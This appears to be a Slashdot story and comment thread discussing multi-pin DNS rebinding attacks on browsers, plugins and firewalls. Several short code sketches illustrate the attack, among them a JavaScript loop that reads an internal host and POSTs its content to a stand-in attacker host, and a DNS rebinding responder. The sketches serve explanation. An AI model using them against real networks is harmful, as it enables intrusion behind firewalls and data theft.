
DNS Rebinding Attacks, Multi-Pin Variant

CmdrTaco posted more than 7 years ago | from the i-feel-safer-already dept.

Security 84

Morty writes "DNS rebinding attacks can be used by hostile websites to get browsers to attack machines behind firewalls, or to attack third parties. Browsers use "pinning" to prevent this, but a paper describes so-called multi-pin vulnerabilities that bypass the existing protections. Note that, from a DNS perspective, this is a "feature" rather than an implementation bug, although it's possible that DNS servers could be modified to prevent external sources from being able to point at internal resources."
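In rough sketch form (all names and addresses here are illustrative, not from the paper), the trick is that the same hostname resolves differently over time while the page's script keeps talking to it:

var answers = ["203.0.113.10",  // 1st lookup: the attacker's own web server
               "10.0.0.5"];     // later lookups: a host behind the victim's firewall
var queries = 0;
function resolve(name) {        // stand-in for a real DNS query with TTL 0
  return answers[Math.min(queries++, answers.length - 1)];
}
console.log(resolve("evil.example")); // page and script load from here
console.log(resolve("evil.example")); // same name now points inside the firewall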


Fox? (0, Flamebait)

StarvingSE (875139) | more than 7 years ago | (#20136005)

Is this a new FOX special?

That is some cool shit... (0)

Anonymous Coward | more than 7 years ago | (#20136115)

... especially where you can frame someone.

I've got to go, ummm, code up a few things.

ah (0)

Anonymous Coward | more than 7 years ago | (#20136161)

It says that it would take 1 second for this to work on Firefox and 4 seconds on Opera [w/out plugins], although they found a way to fix Firefox 2 with a 72-line patch.

NoScript (0)

Anonymous Coward | more than 7 years ago | (#20136175)

Once again, NoScript blocks access to yet another crazy vulnerability.

It may be a pain to use at times, but it sure blocks out a lot of crap. I had to temporarily disable it to get their vulnerability checker to work.

We are now checking your browser... (3, Insightful)

bugnuts (94678) | more than 7 years ago | (#20136201)

We are now checking your browser for DNS rebinding vulnerabilities.
Not without Javascript you aren't!

But it's true, most people loooove that javascript. I can't stand it, myself, and only enable it when I absolutely have to.

Ask Slashdot: Pause a running Javascript (1)

G4from128k (686170) | more than 7 years ago | (#20136345)

Does anyone know of a way to pause/restart someone else's running Javascript (in Firefox or Safari) without reloading the page? I mostly browse with JS off, but occasionally turn it on for one site or another. I'd like to be able to stop/pause JS after it starts (e.g., to pause a CPU-sucking JS animation loop, or to halt JS on a site where I unintentionally had it on).

Any ideas? Thanks.

Re:Ask Slashdot: Pause a running Javascript (1, Informative)

Anonymous Coward | more than 7 years ago | (#20136529)

http://www.getfirebug.com/ [getfirebug.com]

Re:Ask Slashdot: Pause a running Javascript (1)

Random832 (694525) | more than 7 years ago | (#20141889)

And how do you pause a running script without knowing where to set a breakpoint - or for that matter how do you pause a timer (setInterval) at all?
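For the setInterval case, a hedged sketch of the only page-side lever available (illustrative glue code, not a feature of Firebug or any browser): wrap setInterval before the page's own scripts run, e.g. from a Greasemonkey-style user script, so every timer the page registers can be cleared and re-registered later.

// Simplified: extra setInterval arguments are not forwarded.
var timers = [];
var realSetInterval = window.setInterval;
window.setInterval = function (fn, ms) {
  var id = realSetInterval(fn, ms);
  timers.push({ id: id, fn: fn, ms: ms });
  return id;
};
function pauseAll() {
  timers.forEach(function (t) { clearInterval(t.id); });
}
function resumeAll() {
  timers.forEach(function (t) { t.id = realSetInterval(t.fn, t.ms); });
}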

Re:Ask Slashdot: Pause a running Javascript (3, Funny)

captnitro (160231) | more than 7 years ago | (#20136631)

CPU-sucking JS animation loop.. Any ideas?


You should probably consider upgrading from a 486.

Re:Ask Slashdot: Pause a running Javascript (2, Insightful)

Sigma 7 (266129) | more than 7 years ago | (#20137325)

You should probably consider upgrading from a 486.
Won't protect against the buggy Javascript in question.

As an example, let's assume that one of those shaky "Your the 999,999th visitor" ads pins the CPU at 100%. Unless you have only one web browser window/tab open (if you read /., probably not), it will be running more than once and thus cause problems. Even one 100% CPU process or thread can lock down the system - especially if it's called "Spoolsv.exe".

Dual core systems could help... but it won't be long before an SMP process can do the 100% pinning as well.

P.S. If you hear whooshing, you probably want to wear eye/head protection.

Re:Ask Slashdot: Pause a running Javascript (1)

Kwiik (655591) | more than 7 years ago | (#20144323)

we repeat:
You should probably consider upgrading from a 486.

Re:Ask Slashdot: Pause a running Javascript (0)

Anonymous Coward | more than 7 years ago | (#20146063)

Yes, modern processors are so much faster at executing infinite loops.

Re:Ask Slashdot: Pause a running Javascript (1)

Sigma 7 (266129) | more than 7 years ago | (#20159397)

we repeat:
You should probably consider upgrading from a 486.
The processors capable of handling an infinite number of operations in finite time haven't been invented yet. But once that happens, we'll be able to have infinite-precision calculators.

Re:Ask Slashdot: Pause a running Javascript (1)

Kwiik (655591) | more than 7 years ago | (#20163607)

The point is that a faster processor, regardless of whether it's multi-core, gives the OS a much better opportunity to arrange for multitasking with other processes of the same priority.

I really hope nobody is scheduling javascript applications above the default priority.

OTOH, couldn't a plausible fix for this be to have web browsers run all scripted functions in a lower-priority thread?

Re:Ask Slashdot: Pause a running Javascript (2, Interesting)

cheater512 (783349) | more than 7 years ago | (#20137391)

Firefox should kill any bad Javascript automatically.
If a script hogs the CPU, Firefox waits for a period of time and then asks you what to do with it.

Re:Ask Slashdot: Pause a running Javascript (1)

empaler (130732) | more than 7 years ago | (#20140297)

Know where to tweak the time setting for this?

In about:config (3, Informative)

Ayanami Rei (621112) | more than 7 years ago | (#20140687)

Change dom.max_script_run_time to a smaller (or larger) number of seconds.
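If you'd rather set it permanently than flip it by hand, the same pref can go in your profile's user.js (the 5 is just an example value, in seconds):

user_pref("dom.max_script_run_time", 5);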

Re:In about:config (1)

empaler (130732) | more than 7 years ago | (#20146311)

TY :)

(sometimes it does pay off not googling stuff)

Re:We are now checking your browser... (1, Informative)

Anonymous Coward | more than 7 years ago | (#20136533)

Not without Javascript you aren't!

The article mentions Java and Flash are problems as well.

Re:We are now checking your browser... (5, Informative)

grcumb (781340) | more than 7 years ago | (#20136573)

We are now checking your browser for DNS rebinding vulnerabilities.
Not without Javascript you aren't!

Heh, my boy, you just summed up the Web's great affliction in a nutshell.

This particular exploit vector is especially troublesome because turning off the ability to point a name at multiple IPs would break a large part of the Internet. But it wouldn't be an issue for web browsers if we didn't see the need for the Web to be dynamic and interactive. Dynamism and interactivity are really not built into HTTP. It would be more accurate to say that HTTP was designed to be just the opposite.

Website designers and software makers have been trying to turn the Web into a collection of desktop applications since about the time the Web was invented. This runs counter to what Tim Berners-Lee intended. HTTP is stateless for a reason. I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.

Unfortunately, this particular horse bolted from the barn in the earliest days of the web, and there's no easy way to get it back in. A wise web developer will nonetheless read and understand the HTTP protocol. Its statelessness and agnosticism can be strengths when considered in the proper light....

...Yeesh, that last sentence makes me feel like Yoda counselling young Luke.... 8^/

Re:We are now checking your browser... (2, Interesting)

grcumb (781340) | more than 7 years ago | (#20136643)

Heh, I picked a fine day to start pontificating about what the web is for [google.com] ....

Happy birthday, Web. You're almost street legal now.... 8^)

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20136757)

I honestly don't think he made HTTP stateless because he envisioned the havoc that malicious websites could cause, but the principle of agnosticism (i.e. providing content without knowing anything about the requester's capabilities) that's implicit in the protocol is inherently more secure than the desire of many to make websites into remotely-accessed desktop apps.
You make some good points. But I don't think it's productive to imagine what Sir Tim had in mind when he invented http. Like many Internet protocols, http was invented in an era when you just assumed that other users weren't malicious. Remember, this was when you could use any smtp server on the planet without supplying a password.

If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one. Give geeks a new technology, and they'll hack around with it until they make it do all kinds of stuff that was never imagined by the original designers.

Maybe folks should not have kludged interactive applications onto http. But I think it was inevitable. There was a huge demand for distributed applications, and the web was the only platform available. As you say, the horse has left the barn. Indeed, he's now surrounded by PETA types armed with tommy guns. We're not going to get him back.

Re:We are now checking your browser... (1)

larry bagina (561269) | more than 7 years ago | (#20137295)

The original three HTTP methods were GET, PUT, and DELETE; POST/CGI came later. PUT and DELETE are used today in WebDAV, but not as originally intended (think wiki).

Re:We are now checking your browser... (1)

grcumb (781340) | more than 7 years ago | (#20137935)

You make some good points. But I don't think it's productive to imagine what Sir Tim had in mind when he invented http.

Not necessarily productive in any immediate sense, but educative. It does help us understand the current shortcomings of HTTP and to understand as well why it's been hacked into the shape that it's taken these days. I really worry about the naive approaches some so-called Web 2.0 applications take, and wanted to reiterate that those who don't learn from history are condemned to repeat it.

If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one.

Agreed. That's more or less what I was implying, though not nearly as clearly and succinctly. 8^)

Learning what HTTP was originally intended to do and contrasting that with what it became is a useful exercise as long as it's understood that there's no rolling back the clock.

The stateless, agnostic nature of HTTP (I almost said 'the Web', but that's no longer true...) can be used as a feature that enhances the security and the functionality of a website or other online resource, if it's properly understood. But as far as I can tell, the average online application designer today considers HTTP's stateless nature to be a bug rather than a feature.

the source of all internet stupidity (0)

Anonymous Coward | more than 7 years ago | (#20140681)

Like many Internet protocols, http was invented in an era when you just assumed that other users weren't malicious.

Have you ever seen a more naive assumption? Tim must have been about the dumbest person ever to be able to program a computer.

Re:the source of all internet stupidity (1)

mikael (484) | more than 7 years ago | (#20141355)

Have you ever seen a more naive assumption? Tim must have been about the dumbest person ever to be able to program a computer.

Back in that time, the only people using LAN technology were corporate, academic, and military networks, since a network card cost around a grand. The rest of the world had to make do with telnet sessions over dial-up modems or ISDN (paying per kilobyte).

In order for Windows NT to compete against UNIX, Microsoft took the TCP/IP protocol stack and bundled it with Windows NT and Windows 95 (as many developers had to write their own interfaces for their applications - both commercial applications and games). The introduction of other protocols such as SLIP and PPP allowed TCP/IP to run over modem lines, enabling ISPs, including AOL, to provide end-user access.

Don't blame Tim; blame (or thank?) Microsoft. Microsoft could well have tried to invent their own proprietary protocol stack rather than use TCP/IP or any of the other industry equivalents, as seen on the Network Protocols Poster [man.ac.uk].

Re:We are now checking your browser... (1)

Jeruvy (1045694) | more than 7 years ago | (#20184413)

I'm not buying any of this. Sure, some SMTP servers were open, but not the smart ones. Granted, the smart ones were pretty rare. As for dynamic content, this was taken into account, but 'on-the-fly' dynamic content and 'user-generated' dynamic content were not considered. A browser would allow one to browse, not alter or change. But it was simple enough to take the content, alter it, and repost it, even linking to the original. However, IP and ownership of the 'content' got in the way. We quickly realized we didn't want 'free' content, or content that anyone could change, so http morphed into a 'way to conduct business' rather than a document protocol. Back in 1991 we were learning about the potential for worms (remember the Morris worm!), so this 'era' was not so utopian as you claim. It was then we learned about the issues with DNS that still haven't been solved today. Do you remember how many sites used to keep us posted with web defacements? It became a big thing in a very short order of time; by 1994 it was starting to get out of hand.

If you want to get religious about "what the web was meant for" then you have to reject not just dynamic content, but any web application that goes beyond Sir Tim's original concept of simple shared documents. But of course, people went beyond that from day one. Give geeks a new technology, and they'll hack around with it until they make it do all kinds of stuff that was never imagined by the original designers.

Maybe folks should not have kludged interactive applications onto http. But I think it was inevitable. There was a huge demand for distributed applications, and the web was the only platform available. As you say, the horse has left the barn. Indeed, he's now surrounded by PETA types armed with tommy guns. We're not going to get him back.
No, the problem was people didn't like articles being 'reformatted' for http; they found this annoying. Many thought MS Word format would be the document reader of choice, so even Word became a mini browser. On top of this, many companies tried to pigeon-hole what the web or internet was going to be by dominating the traffic. Again, this went contrary to researchers, but marketers were not going to be dissuaded from such common sense. Over time many ideas have died only to be reborn in Java or AJAX. Flash has grown from a simple animation tool into a completely interactive interface (with many issues of its own). The real religious aspect of all this is that many developers were not interested in this new direction for http, yet many ex-dotcommers were more than eager to design schemes that offered more and better from their web pages. Today's world is a testament to all that ignorance. Web application attacking is rampant! Way to go! We really need to create a true peer-to-peer client that can do all these wonderful things within a sandbox, so if something gets out of hand (a buffer overflow, or directory traversal attempts, etc.) it doesn't get out of the box.

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20184731)

Sure some SMTP servers were open, but not the smart ones.
Dude, when I started using the internet in 1994, I was able to telnet into any SMTP server. Richard Stevens even used this fact in his book on TCP/IP, to demonstrate how SMTP worked.

Re:We are now checking your browser... (1)

Jeruvy (1045694) | more than 7 years ago | (#20223847)

Dude, the Morris worm worked by exploiting SMTP; what's your point? The "smart" ones 'fixed' the problem. It took the rest of the planet 10 years. Typical.

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20224689)

My point being that there was a time when people didn't feel a need to secure their SMTP servers.

Re:We are now checking your browser... (1)

Jeruvy (1045694) | more than 7 years ago | (#20242313)

Your point is lost now. Even today there are people who don't feel the need to secure their (insert term) servers; we call their machines zombies.

Re:We are now checking your browser... (1)

fm6 (162816) | more than 7 years ago | (#20242513)

Jeez, you're dense. I said that some Internet conventions date back to a period when people didn't worry about security; as an example, I mentioned that people didn't even secure their SMTP servers. You said "smart people always secured their servers," which isn't true.

If you can't follow that argument, I'm certainly not going to try to parse it for you.

Re:We are now checking your browser... (1)

DrSkwid (118965) | more than 7 years ago | (#20140049)

> This runs counter to what Tim Berners-Lee intended

He never thought of the Host: header either; perhaps we should go back to one IP per domain.

Re:We are now checking your browser... (1)

sootman (158191) | more than 7 years ago | (#20141799)

I can't resist: "Read the Source, Luke!"

Mods: don't waste points on this. :-)

Re:We are now checking your browser... (1)

kayditty (641006) | more than 7 years ago | (#20288665)

This doesn't require round-robin DNS to work. The main proof of concept linked from that page actually just creates a new A entry for unixtimestamp().some_3_digit_value.domain.tld.

This entry points to the attacking webserver and is given a very low TTL. Once DNS pinning is circumvented, the entry is changed. It doesn't need more than one A record.
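As a sketch, the client side of that naming scheme is a one-off hostname built per visit (names illustrative), so no shared resolver can ever have it cached:

var label = Math.floor(Date.now() / 1000) + "." +    // unixtimestamp()
            (100 + Math.floor(Math.random() * 900)); // some_3_digit_value
var host = label + ".domain.tld";                    // e.g. "1186500000.427.domain.tld"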

Re:We are now checking your browser... (1)

wytcld (179112) | more than 7 years ago | (#20137445)

Um ... at the author's site:

We have detected that your browser is vulnerable to efficient DNS rebinding attacks.
Since I'm running Noscript, either the author of the paper is a liar (or his "test" is phoney), or else you're wrong when you say

Not without Javascript you aren't!
Guess I'll have to read the PDF.

The best defense: (0)

Anonymous Coward | more than 7 years ago | (#20136243)

No java, no javascript, no flash.

Everyone has to start using noscript.

Re:The best defense: (0)

Anonymous Coward | more than 7 years ago | (#20136411)

Awesome - no AJAX and we can stop hearing about "web 2.0".

Oh, wait - then Slashdot's new stuff won't work, Digg's stuff won't work and all that.

Re:The best defense: (0)

Anonymous Coward | more than 7 years ago | (#20136513)

Except NoScript works on a per-site/domain basis (i.e., slashdot.org only, not every other site within its pages). Handy, until the site you've whitelisted is compromised.

Re:The best defense: (1)

DrSkwid (118965) | more than 7 years ago | (#20140059)

Slashdot has javascript?
Can't say I've noticed any loss of functionality, but then I wouldn't, would I.
I run in LightHTML mode with Web Developer's "Disable Page Colours" enabled.

Black & White for me baby!

Sick and tired of javascript (0)

Anonymous Coward | more than 7 years ago | (#20136671)

Haven't we learned the lesson yet? I learned it a decade ago, and sites still unnecessarily rely on script for basic functionality.

There's nothing wrong with script; there is something very wrong when users cannot use a site without it. Something like NoScript should be built into all browsers by default, and bullshit like ASP.NET's __doPostBack purged from the web.

Flashback (4, Insightful)

Spazmania (174582) | more than 7 years ago | (#20136747)

If you haven't read the article, I'll summarize it for you: it's another critical vulnerability in Java/Javascript. The sandboxed script in the web browser alternately makes GET and POST requests to the "same" server, with each POST containing the contents of the prior GET... Only the IP address associated with the server's hostname keeps alternating between a server inside your firewall and the attacker's real server outside it. Oops.
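A minimal sketch of that loop, with an illustrative hostname (not the paper's code; the attacker is assumed to flip the name's A record between an inside and an outside address between lookups):

var loot = null;
function tick() {
  var xhr = new XMLHttpRequest();
  if (loot === null) {
    // Pin has flipped inward: read from the internal host.
    xhr.open("GET", "http://rebind.attacker.example/", true);
    xhr.onload = function () { loot = xhr.responseText; };
    xhr.send();
  } else {
    // Name resolves back outside: ship the loot to the real server.
    xhr.open("POST", "http://rebind.attacker.example/", true);
    xhr.send(loot);
    loot = null;
  }
}
setInterval(tick, 120 * 1000); // slow enough for the pin to lapse between rounds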

At times like these, I tell a story about 1988 when I wrote a BBS terminal emulator for the Commodore 64 which cleverly allowed the BBS to send and run new code on the caller's machine. Another gentleman who didn't much like me noticed the feature and arranged for a number of BBS systems to execute the code at location 64738: system reset.

There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?

The folks at Sun might disagree with: (0)

Anonymous Coward | more than 7 years ago | (#20137071)

"There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network."

Re:Flashback (1)

Lux (49200) | more than 7 years ago | (#20137241)

> There is no safe way to run complex sandboxed code on a user's PC and no safe way to allow sandboxed code access to the network. Either you trust the source of the program and let it do what it needs to do, or you don't trust it and don't allow it to run on your PC at all. How many of these vulnerabilities are we going to run through before we finally figure that out?

I'm not as much of a pessimist as you are on this. The fact that so much of attackers' energy goes into circumventing the same-origin policy speaks to the theoretical efficacy of the policy. The problem in this case is that the identity of the origin is security-critical, and defined in terms of DNS -- a horribly insecure protocol.

If the "origin" the policy speaks to had some intransient relationship to where packets were actually being routed, then the issue in the article wouldn't be a problem. Combine that with solid implementations of the policy, and stop the proliferation of sandboxes that ALL have to be correct (perhaps by replacing Javascript, Java, Flash, ActiveX, et cetera with a unified client-side web programming standard) and browser sandboxing could work okay. A tall order, yes, but a feasible five-to-ten year scenario.

Then you'd still have to worry about XSS, but I think that's a separate problem from sandboxing.

Re:Flashback (2, Informative)

statusbar (314703) | more than 7 years ago | (#20138433)

One point made in the paper:

Current versions of the JVM are not vulnerable to this attack because the Java security policy has been changed. Applets are now restricted to connecting to the IP address from which they were loaded.

If the web browser and applet connect to the server via a proxy, then neither the web browser nor the applet has control over "connecting to the same IP address from which they were loaded".

Therefore, if a proxy is involved, current versions of the JVM are still vulnerable.

Fortunately, the paper goes into detail about this later on:

Proxies. If a client uses an HTTP proxy to access the web, these mitigations do not prevent multi-pin attacks using Java applets. Clients using an HTTP proxy request web objects by URL, not by IP address.

The irony is that many organizations use proxies to implement both content and virus filtering. The use of these proxies makes their web browsers MORE susceptible to these pinning attacks.

--jeffk++

So where's the beef? (1)

Apple Acolyte (517892) | more than 7 years ago | (#20136835)

Is this a real threat? If so, how severe is it and how much effort must be expended to fix it?

Re:So where's the beef? (1)

martin_henry (1032656) | more than 7 years ago | (#20136955)

Here. [google.com.au]

Re:So where's the beef? (0)

Anonymous Coward | more than 7 years ago | (#20137705)

Is this a real threat? If so, how severe is it and how much effort must be expended to fix it?

I could answer your questions, but you probably won't read it, since it would look like the article you seem unable to read.

pinning (1)

gronofer (838299) | more than 7 years ago | (#20136879)

What is "pinning" you may ask? From the linked pdf article, it's the caching of DNS lookups:

A common defense [for DNS rebinding attacks] implemented in several browsers is DNS pinning: once the browser resolves a host name to an IP address, the browser caches the result for a fixed duration, regardless of TTL.

But apparently this can be subverted with browser plug-ins, which have a separate "pin database".
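In sketch form (a toy model, not any browser's actual code), a pin is just a cache entry that outlives the DNS TTL:

var PIN_MS = 15 * 60 * 1000; // fixed pin lifetime, chosen by the browser
var pins = {};               // hostname -> { ip, expires }
function resolvePinned(host, dnsLookup) {
  var hit = pins[host];
  if (hit && hit.expires > Date.now()) return hit.ip; // TTL ignored on purpose
  var ip = dnsLookup(host);                           // real DNS query
  pins[host] = { ip: ip, expires: Date.now() + PIN_MS };
  return ip;
}

The multi-pin attack works because each plug-in keeps its own pins table, so an attacker can arrange for one sandbox's answer to disagree with another's.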

Re:pinning (1)

Spazmania (174582) | more than 7 years ago | (#20141971)

it's the caching of DNS lookups

Specifically, it's the caching of DNS lookups IN VIOLATION OF the DNS protocol's standard for TTL. This causes all manner of havoc when you change ISPs and need the old name/address mappings to expire quickly. I've seen Windows boxen continue to poll the old IP address for a web site weeks after a record with a 5-minute TTL was changed to point at the new IP address.

Pinning is bad bad bad and any application so poorly designed that it needs pinning to work securely is worse. If Javascript can't operate securely using DNS in the standard way, don't allow it to use DNS at all.

Wow. Really amazing... (4, Interesting)

mcrbids (148650) | more than 7 years ago | (#20136945)

Did you read the abstract?

It's well written, and has lots of examples of exactly how this vulnerability can be exploited. In short, I could probably sit down and, in a single afternoon, write a set of scripts for a webserver and DNS server, post them on a $30/month "virtual host" server, take out an ad for $100, and end up with a powerful DDoS attack on my host of choice.

All done in less than 24 hours.

Screw the "cyber-terrorists" in Russia, this is REALLY BIG, and is one of many REALLY BIG problems that can be exploited! And the fact that we're here, reading and posting, is a demonstration that the many vulnerabilities of the Internet are NOT being exploited to anything like their real potential...

So think about it: while we here at Slashdork might know as many as a dozen exploitable vulnerabilities like this one that would be nearly impossible to close, how many of us have actually DONE any of these?

And that, folks, is why security will NEVER be 100% technical, and there will always be a social mechanism involved - there really is an amazing amount of security in simply knowing that if you do, really bad stuff could really happen to you.

Not will happen, not even likely to happen. Just could happen is enough.

Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.

As a case in point, I was chatting with my flight instructor and a staff member at the local FBO (an airport for small planes) and the staff member mentioned something about an annoying ex-boyfriend who kept calling her.

Without thinking, I mentioned the possibility of writing a quick script to send him 100,000 text messages that would say "Leave me the freak alone!". I imagined a two-line script that would take all of about 10 seconds to write, and I could use the hotspot at the FBO to do it.

100,000 isn't even a particularly big number for me - I routinely deal with datasets in the millions of records - so it didn't really occur to me right away what a blow that would be. But 100,000 times 5 cents adds up to $5,000 worth of text messages! And I'm sure that his cell company would limit the number of messages to be sent, but it's pretty certain that quite a few WOULD get through.

It was surprising to me what a staggering blow this would be. I was actually a bit embarrassed at having mentioned it.

Don't underestimate the power of social mechanisms to ensure our security!

Re: security through ... (0)

Anonymous Coward | more than 7 years ago | (#20137635)

there really is an amazing amount of security in simply knowing that if you do, really bad stuff could really happen to you.
In other words, you're advocating security through ... maturity? ;-)

Re:Wow. Really amazing... (1)

flonker (526111) | more than 7 years ago | (#20138645)

The really scary thing is repinning to the local IP address and then using the socket-based vulnerabilities to reach port 135, allowing the attacker to bypass software (and hardware) firewalls and fully compromise the victim. All for the cost of a single ad impression!

Re:Wow. Really amazing... (0)

Anonymous Coward | more than 7 years ago | (#20138747)

those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks.


OR

work for a variety of intelligence agencies/bureaus/etc. in a number of nations using such skills for nefarious purposes while getting paid quite well and being pretty damn well insulated against any repercussions deserved or undeserved.

Re:Wow. Really amazing... (1)

gronofer (838299) | more than 7 years ago | (#20138799)

Besides, there's a funny paradox at work here: those who have the skills to pull off an attack like this also have the skills to earn an income that's legitimate, without all the risks. I'm tempted from time to time to make use of my skills in a bad way when I think about how easy it is for me to wreak havoc - but the risks of doing so have always stopped me far short. I enjoy my day job, since its nature is fundamentally altruistic. So I'm harmless.
I don't have a day job, but still can't be bothered wreaking havoc. I suppose you need to have a particular enthusiasm for it.

Re:Wow. Really amazing... (1)

ShakaUVM (157947) | more than 7 years ago | (#20139487)

Yeah, when I was in college 10 years ago I discovered several ways of effectively shutting down the internet. The possibility of punishment wasn't there (our lab computers didn't require people to log in to use them, so there was no audit trail), but I still didn't do it, since I am of the opinion that practical jokes should always be in good humor.

Re:Wow. Really amazing... (1)

neurovish (315867) | more than 7 years ago | (#20146683)

Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely useless? In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain. Beyond that, some knowledge of the internal network is required so the attacker knows where to go. Does the javascript exploit change the user's DNS server to something malicious?

In the event that everything lines up, this looks pretty effective, but there also seem to be many ways of getting the same results that are way easier.

Re:Wow. Really amazing... (1)

Morty (32057) | more than 7 years ago | (#20154183)

Perhaps I'm missing something critical here, but wouldn't the complexity of this attack make it largely useless? In order to switch the user's DNS back and forth between external and internal, you would need control of that user's DNS server, or at least a DNS server further up the chain.

RTFA. The attacker doesn't manipulate the user's DNS; the attacker manipulates his/her own DNS. The attacker uses records with low or 0 TTLs, so the user's DNS doesn't cache them, as per spec. The trick is that the attacker changes his/her own DNS to point at the user's own names or addresses.

Beyond that, some knowledge of the internal network is required so the attacker knows where to go.

Yes. Which, for targeted attacks (think corporate espionage or hostile national governments), is not unrealistic.

Does the javascript exploit change the user's DNS server to something malicious?

RTFA. No; the attacker manipulates his/her own DNS, using a low TTL.
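In sketch form, the attacker-side answer logic could be as simple as this (illustrative placeholders, not the paper's code):

var EXTERNAL_IP = "203.0.113.10";    // the attacker's real web server
var INTERNAL_TARGET = "192.168.0.1"; // an address inside the victim's network
var seen = {};
function answerFor(name) {
  // First query for a name serves the attack page; any later query
  // (after the victim's pin lapses) rebinds the name inward. TTL 0
  // keeps spec-compliant caches from reusing either answer.
  var first = !seen[name];
  seen[name] = true;
  return { address: first ? EXTERNAL_IP : INTERNAL_TARGET, ttl: 0 };
}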

Seems they forgot a few things (3, Informative)

linuxkrn (635044) | more than 7 years ago | (#20137007)

I did RTFA, and it seems to me they made an oversight: most ISP/corporate sites use a caching DNS server. A repeated lookup of the same domain will return the cached result. Their POC depends on the client doing another lookup and getting a different result, so this attack would depend on the client being able to reach the attacker's DNS.

Now they do say that the attacker's DNS returns more than one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh not to get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP, Qwest, has a bad habit of ignoring the TTL in my zone files.

Example 1:

target lookup (T0) -> www.attacker.com
www.attacker.com -> 192.168.0.1

target lookup (T1) -> www.attacker.com
ISP/site cached reply -> 192.168.0.1 (attack failed)

Example 2:
target lookup (T0) -> www.attacker.com
www.attacker.com -> 192.168.0.1

target lookup (T1) -> www2.attacker.com
attacker's ISP cached reply -> 192.168.0.1 (attack failed again)

The only case I can see this working is if the zone records contain an IP for some third-party source that they want to try to abuse. So say www2.attacker.com points to 10.0.0.1, and that number is static in their zone record. Which appears to be a much less efficient version of a zombie scan with IP spoofing.

And finally, this is all dependent on the attacker tricking the client into loading Flash/Java/Javascript from their box. Another win for NoScript.

Re:Seems they forgot a few things (1)

evought (709897) | more than 7 years ago | (#20137623)

[snip]
Now they do say that the attacker's DNS returns more than one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh not to get cached. And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP, Qwest, has a bad habit of ignoring the TTL in my zone files.
[snip]
Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.

Re:Seems they forgot a few things (1)

Morty (32057) | more than 7 years ago | (#20137791)

Worse than that, they are assuming that the OS itself is not caching the result. I sometimes have to manually flush my cache (OS X) when playing with DNS records. OS X can't be the only system that caches lookups.
The article explicitly says that the attack assumes low or 0 TTLs. Your OS cache should not be caching 0 TTLs per RFC1034. Normally, you need to flush the cache because you are editing a record with a high(er) TTL, so your local cache legitimately retains the old version of the record. Some caches do ignore record TTLs, though.

- Morty

Re:Seems they forgot a few things (2, Informative)

afidel (530433) | more than 7 years ago | (#20138751)

Your OS cache should not be caching 0 TTLs per RFC1034

Meanwhile, back in the real world, both OS X and Windows DO ignore 0 TTLs, as do many ISPs' caching DNS servers. This is one of the things that makes round-robin DNS and ISP cutovers rather hard to plan in the real world. In fact, I assume that some worst-case ISPs will cache results for 48-72 hours despite a TTL of, say, 10 minutes.

Re:Seems they forgot a few things (1)

Morty (32057) | more than 7 years ago | (#20137747)

Now they do say that the attacker's DNS returns more than one A record for each request. But they are ignoring the fact that the serial number of the zone would have to change for a refresh not to get cached.

DNS servers cache based on the resource record's TTL, not based on the zone's SOA's serial. The serial is used by secondaries.

And even if they did create a new zone record for each visit, with the target's IP (seems unlikely), all the servers back to the client would need to respect it. Again, my ISP, Qwest, has a bad habit of ignoring the TTL in my zone files.

The article assumes that third-party caches respect low and 0 TTLs. RFC1034 and RFC1035 say that a TTL of 0 should work. Many (most?) DNS caching servers obey the RFCs and respect low/0 TTLs. Changing this default would be a valid workaround for this problem, but would break legitimate uses of low/0 TTLs (e.g., high-availability solutions that do rapid failover).
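For contrast with pinning, a cache that follows the RFCs looks roughly like this minimal sketch: an entry lives exactly TTL seconds, so a 0-TTL answer is never reused, which is exactly the behavior the attack leans on.

var cache = {}; // name -> { ip, expires }
function lookup(name, queryUpstream) {
  var hit = cache[name];
  if (hit && hit.expires > Date.now()) return hit.ip;
  var ans = queryUpstream(name); // { ip, ttl } from the authoritative server
  if (ans.ttl > 0) {
    cache[name] = { ip: ans.ip, expires: Date.now() + ans.ttl * 1000 };
  }
  return ans.ip;
}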

- Morty

Re:Seems they forgot a few things (2, Informative)

BitZtream (692029) | more than 7 years ago | (#20138191)

The zone serial number has nothing to do with this. DNS cache entries, whether on the host, in caching DNS servers, or on the client's primary DNS server, are controlled by the TTL (time-to-live) setting. If you set the TTL to 0, you effectively disable caching across the internet for your domain. You may find some caching servers that won't honor a 0, but they're sure to expire the cache entry pretty quickly, and they are few and far between.

Re:Seems they forgot a few things (2, Informative)

ACMENEWSLLC (940904) | more than 7 years ago | (#20142047)

It seems to be a given, per TFA, that the host name must stay the same for this to work and that the TTL must be very low.

